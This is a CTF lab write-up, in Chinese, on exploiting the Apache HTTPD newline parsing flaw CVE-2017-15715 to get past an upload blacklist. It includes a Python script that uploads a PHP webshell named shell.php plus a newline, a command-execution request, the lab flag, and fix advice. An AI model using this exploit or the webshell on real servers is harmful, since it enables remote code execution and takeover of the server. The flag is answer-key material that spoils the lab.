玄机网络安全靶场:Apache HTTPD 解析漏洞(CVE-2017-15715)WP

解题报告:Apache HTTPD 解析漏洞(CVE-2017-15715)

平台 :玄机(xj.edisec.net
难度 :简单
类型 :渗透
Flagflag{0c6fb482-b0f2-46a1-ad80-420abc288738}


一、漏洞背景

CVE-2017-15715 是 Apache HTTP Server 2.4.0 至 2.4.29 版本中存在的一个文件解析漏洞。当文件名以换行符(\x0A)结尾时,Apache 的 mod_php 模块仍会将其识别为 PHP 文件并执行,从而绕过基于文件后缀名的黑名单过滤机制。

漏洞根本原因在于 Apache 对文件名的正则匹配中,.php$ 模式在默认情况下允许 $ 匹配换行符前的位置(而非严格的字符串末尾),导致 shell.php\x0a 被识别为 PHP 文件。


二、靶机信息

项目
靶机 IP 43.192.168.223
服务端口 8081
Apache 版本 2.4.10 (Debian)
上传接口 POST /(即 /index.php
上传字段 file(文件内容)、name(保存文件名)

三、漏洞利用过程

3.1 服务探测

访问 http://43.192.168.223:8081/ 返回一个简单的文件上传页面,包含两个字段:

  • file:选择上传的文件
  • name:指定服务器端保存的文件名(默认值为 evil.php

服务器端代码逻辑为:move_uploaded_file($_FILES['file']['tmp_name'], './' . $_POST['name'])

3.2 绕过分析

服务器端对 name 字段进行了黑名单过滤,禁止直接上传 .php 后缀的文件。但由于 CVE-2017-15715,将文件名设置为 shell.php\x0a(含换行符)时:

  1. 上传阶段 :PHP 的 move_uploaded_file 函数将文件保存为 shell.php\x0a(含换行符的文件名)
  2. 访问阶段 :Apache 的 mod_php 在匹配文件处理器时,正则 .php$ 匹配到 shell.php$ 在多行模式下匹配换行符前的位置),将该文件作为 PHP 执行

3.3 利用步骤

步骤一:构造包含换行符的上传请求

python 复制代码
import requests

TARGET = "http://43.192.168.223:8081"
webshell = b'<?php system($_GET["cmd"]); ?>'

resp = requests.post(
    f"{TARGET}/",
    files={'file': ('shell.php', webshell, 'image/jpeg')},
    data={'name': 'shell.php\x0a'},   # 关键:name 字段含 \x0a
    timeout=5
)

步骤二 :访问 webshell 执行命令(URL 中用 %0a 编码换行符)

复制代码
GET http://43.192.168.223:8081/shell.php%0a?cmd=cat+/flag

步骤三:获取 Flag

复制代码
flag{0c6fb482-b0f2-46a1-ad80-420abc288738}

四、关键技术细节

技术点 说明
换行符绕过 name 字段值为 shell.php\x0a,PHP move_uploaded_file 保留换行符
URL 访问 访问时使用 %0a 编码,即 /shell.php%0a
Apache 解析 mod_phpAddHandler application/x-httpd-php .php 配置中,正则 \.php$ 在多行模式下匹配 shell.php\n

五、修复建议

  1. 升级 Apache 至 2.4.30 及以上版本(官方已修复)
  2. 使用白名单 :仅允许特定后缀(如 .jpg.png)的文件上传,而非黑名单
  3. 文件名过滤:对上传文件名进行严格的字符过滤,去除换行符、空字节等特殊字符
  4. 存储隔离:将上传目录设置为不可执行,禁止 Apache 在该目录下执行 PHP 脚本

相关推荐
志栋智能1 小时前
跨越人机边界:超自动化巡检如何重塑工作流程?
运维·网络·人工智能·安全·自动化
书源丶1 小时前
三十二、Java集合(一)——Collection与List全家桶
java·windows·list
阿哟阿哟1 小时前
立创3D模型快速下载
笔记·单片机·嵌入式硬件
shehuiyuelaiyuehao1 小时前
关于md格式
笔记
AI人工智能+电脑小能手1 小时前
【大白话说Java面试题】【Java基础篇】第21题:HashMap和Hashtable的区别是什么
java·开发语言·面试·哈希算法·散列表·hash table
weixin_514253181 小时前
425-aguvis tmux
web安全
慕容卡卡1 小时前
Claude 使用神器(web页面)--CloudCLI UI
java·开发语言·前端·人工智能·ui·spring cloud
Sylvia-girl1 小时前
C++内存如何管理?
java·jvm·c++
极创信息1 小时前
信创领域五种主流CPU架构(X86 / ARM / RISC-V / MIPS / LoongArch)
java·arm开发·数据库·spring boot·mysql·软件工程·risc-v